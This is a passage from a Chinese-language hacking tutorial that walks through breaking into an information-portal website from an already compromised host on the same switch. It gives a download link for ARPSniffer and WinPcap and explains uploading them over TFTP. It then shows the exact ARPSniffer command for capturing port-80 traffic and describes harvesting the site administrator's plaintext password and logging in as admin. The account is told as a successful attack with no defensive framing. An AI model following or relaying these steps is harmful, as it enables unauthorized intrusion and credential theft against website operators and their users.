现在要通过手里的肉鸡入侵信息港了。首先还是要查看一下两个网站服务器是不是位于同一个交换机下。远程连接肉机,在肉鸡的CMD窗口中输入命令"tracert 攻击目标IP地址",令人兴奋的是看到直接返回了目标IP地址(如图4),现在可以确定两台主机都在同一交换机下了,看来有戏啦!可以考虑用嗅探的方法从肉鸡上获取信息港的管理员密码或者其它有用的信息。现在要用到的是一个名叫"ARPSniffer.exe"的软件(下载地址:http://admin.cnxhacker.net/Soft/uploadsoft/200409/arpsniffer.rar)。这个软件有DOS版和WIN版,RPSniffer也是小榕哥开发的一款工具非常好的嗅探工具,它可以用在交换机的环境下。在使用这个嗅探工具前首先要使用机器上安装WinPCAP驱动。怎么上传ARPSniffer到肉鸡上?还是老方法用TFTP传送。在本机上运行Tfpd32,将本机建成为一个TFTP服务器,点击界面中的"Browse"按钮,选择ARPSniffer下载压缩包的解压路径(如图5),然后在肉鸡的命令窗口中运行"Get -i TFTP服务器IP地址 文件名"即可。在这里下载后的压缩包中有两个版本的程序,我们只需要上传"arpsniffer.exe"和"WinPcap_3_0_a.exe"即可。上传成功后先运行"WinPcap_3_0_a.exe"安装嗅探驱动程序。
图 5
四、利用ARPSniffer渗透攻击真正目标
现在是万事具备,只欠嗅探。先在命令窗口中运行"Ipconfig /all"命令,查看一下肉鸡上的网址配置情况和网关IP地址(如图6)。可以查到网关(Default Gateway)为"203.207.***.1",运行ARPSniffer命令:
"Arpsniffer 203.207.***.1 203.207.***.2 80 c:\password.txt";
即可开始在肉鸡上监听攻击目标IP的80端口了(如图7)。攻击目标IP上所有通过80端口收发的密码将被保存在"Password.txt"文件中。在嗅探时需要注意,如果在肉鸡上安装有两块网卡的话,还要在刚才的Arpsniffer命令后加上数字参数指定嗅探的网卡ID。
图 6
(图片较大,请拉动滚动条观看)
图 7
(小提示:当然我们也可以嗅探其它的端口,如21和25端口等获得Telnet密码。但是由于管理员以Web方式登录的几率较大些,所以我们选择了嗅探80Web端口。)
五、获得管理员密码
最后剩下来的事情就是坐着等待攻击目标网站上的管理员登录了。很快就看到了肉鸡上的命令窗口中有了反应,打开"password.txt"就可以看到密码。不过由于我们还在监听过程中,所以"password.txt"文件是无法直接打开的,而且也不能复制。想要查看密码记录文件,必须先终止嗅探进程。可以在肉鸡嗅探窗口中直接按下"Ctrl+C"键,就可以中止嗅探了。不过可能同时也会将我们在本机与肉鸡建立的连接窗口关闭掉了。结束后看一看,呵呵,真的有收获啦,网站管理的密码都以明文的方式保存在文本里面啦!现在还等什么呢?又可以以管理员身份登入信息港故地重游啦!
